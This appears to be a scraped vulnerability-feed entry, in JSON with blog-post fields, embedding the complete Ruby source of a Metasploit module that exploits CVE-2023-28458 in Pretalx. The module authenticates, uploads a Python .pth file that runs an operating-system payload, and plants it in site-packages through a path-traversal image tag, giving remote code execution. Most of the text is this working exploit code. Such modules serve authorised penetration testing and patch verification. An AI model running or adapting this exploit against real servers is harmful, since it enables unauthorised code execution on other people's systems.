{“lastseen”:”2025-08-29T19:54:41″,”description”:”This module exploits CVE-2023-28458, a limited file write in Pretalx, up to…”,”published”:”2025-08-28T18:53:51″,”modified”:”2025-08-29T18:53:34″,”type”:”metasploit”,”title”:”Pretalx Limited File Write to Remote Code Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-28458″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HTTP::Pretalx\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Pretalx Limited File Write to Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits CVE-2023-28458, a limited file write in Pretalx, up to version 2.3.1. The module will use the vulnerability to write a malicious site-specific configuration hook forPython. Once hook is written, payload will be executed every time Pretalx user runs any Python code. Pretalx needs to run in debug mode to exploit this.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Stefan Schiller’, # security researcher\\n ‘msutovsky-r7’ # module dev\\n ],\\n ‘References’ =\\u003e [\\n [ ‘URL’, ‘https:\/\/www.sonarsource.com\/blog\/pretalx-vulnerabilities-how-to-get-accepted-at-every-conference\/’],\\n [ ‘CVE’, ‘2023-28458’]\\n ],\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Targets’ =\\u003e [\\n\\n [\\n ‘Linux Target’,\\n {\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’]\\n }\\n ]\\n ],\\n ‘DefaultOptions’ =\\u003e { ‘WfsDelay’ =\\u003e 60 * 5 },\\n ‘DisclosureDate’ =\\u003e ‘2023-03-07’,\\n ‘DefaultTarget’ =\\u003e 0,\\n\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘EMAIL’, [true, ‘User email to Pretalx backend’]),\\n OptString.new(‘PASSWORD’, [true, ‘Password to Pretalx backend’]),\\n\\n OptString.new(‘PYTHON_VERSION’, [true, ‘Python version running on target machine’, ‘python3.8’])\\n ])\\n end\\n\\n def check\\n return Exploit::CheckCode::Unknown, ‘Login failed, please check credentials’ unless login(datastore[‘EMAIL’], datastore[‘PASSWORD’])\\n\\n @logged_in = true\\n\\n version_element = get_version\\n\\n return Exploit::CheckCode::Safe(‘Debug mode is not enabled’) unless debug?\\n\\n return Exploit::CheckCode::Appears(\\”Detected vulnerable version #{version_element} and debug mode is enabled\\”) if version_element \\u003c= Rex::Version.new(‘2.3.1’)\\n\\n return Exploit::CheckCode::Safe(\\”Detected version #{version_element} is not vulnerable\\”)\\n rescue UnexpectedResponseError\\n return Exploit::CheckCode::Unknown(‘Received unexpected response, check your options’)\\n rescue VersionCheckError\\n return Exploit::CheckCode::Detected(‘Pretalx detected, failed to verify version’)\\n rescue CsrfError\\n return Exploit::CheckCode::Unknown(‘Failed to get CSRF token’)\\n rescue SessionCookieError\\n return Exploit::CheckCode::Detected(‘Pretalx detected, failed to get session cookie – check your credentials’)\\n rescue DebugError\\n return Exploit::Checkcode::Detected(‘Failed to check if debug mode is enabled’)\\n end\\n\\n def exploit\\n vprint_status(‘Registering malicious speaker and proposal’)\\n\\n proposal_info = {\\n email: datastore[‘EMAIL’],\\n password: datastore[‘PASSWORD’]\\n }\\n\\n registration_info = register_proposal(proposal_info)\\n proposal_name = registration_info[:proposal_name]\\n\\n vprint_status(\\”Logging with credentials: #{datastore[‘EMAIL’]}\/#{datastore[‘PASSWORD’]}\\”)\\n\\n fail_with Failure::NoAccess, ‘Incorrect credentials’ unless @logged_in || login(datastore[‘EMAIL’], datastore[‘PASSWORD’])\\n\\n vprint_status(‘Approving proposal’)\\n\\n proposal_id = approve_proposal(proposal_name)\\n vprint_status(‘Uploading resource with payload’)\\n resource_name = Rex::Text.rand_text_alphanumeric(5)\\n resource_data = %(import os;os.system(\\”#{payload.encoded}\\”) )\\n res = edit_proposal(Rex::Text.rand_text_alphanumeric(4), ”, proposal_id, proposal_name, \\”#{resource_name}.pth\\”, resource_data)\\n\\n fail_with Failure::PayloadFailed unless res.body =~ \/#{resource_name}_([a-zA-Z0-9]+)\\\\.pth\/\\n\\n full_resource_name = \\”#{resource_name}_#{Regexp.last_match(1)}.pth\\”\\n\\n vprint_status(‘Inserts write primitve’)\\n\\n write_primitive_description = \\”\\u003cimg src=’%2fmedia%2f#{datastore[‘CONFERENCE_NAME’]}%2fsubmissions%2f#{proposal_id}%2fresources\/..\/..\/..\/..\/..\/tmp\/media%2f#{datastore[‘CONFERENCE_NAME’]}\/..\/..\/..\/pretalx\/.local\/lib\/#{datastore[‘PYTHON_VERSION’]}\/site-packages\/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fmedia%2f#{datastore[‘CONFERENCE_NAME’]}%2fsubmissions%2f#{proposal_id}%2fresources%2f#{full_resource_name}’\/\\u003e\\”\\n edit_proposal(Rex::Text.rand_text_alphanumeric(4), write_primitive_description, proposal_id, proposal_name, ”, ”)\\n vprint_status(‘Adding proposal to schedule’)\\n add_proposal_to_schedule(proposal_name)\\n vprint_status(‘Releasing schedule’)\\n release_schedule\\n\\n vprint_status(‘Exporting schedule’)\\n export_zip\\n vprint_status(‘Waiting for cron to run Python under Pretalx user’)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/pretalx_rce_cve_2023_28458.rb”,”cvss”:{“score”:4.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:N\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/pretalx_rce_cve_2023_28458\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:54:41″,”description”:”This module exploits CVE-2023-28458, a limited file write in Pretalx, up to…”,”published”:”2025-08-28T18:53:51″,”modified”:”2025-08-29T18:53:34″,”type”:”metasploit”,”title”:”Pretalx Limited File Write to Remote Code Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-28458″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,123,12,21,169,13,7,11,5],"class_list":["post-15170","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-43","tag-exploit","tag-medium","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n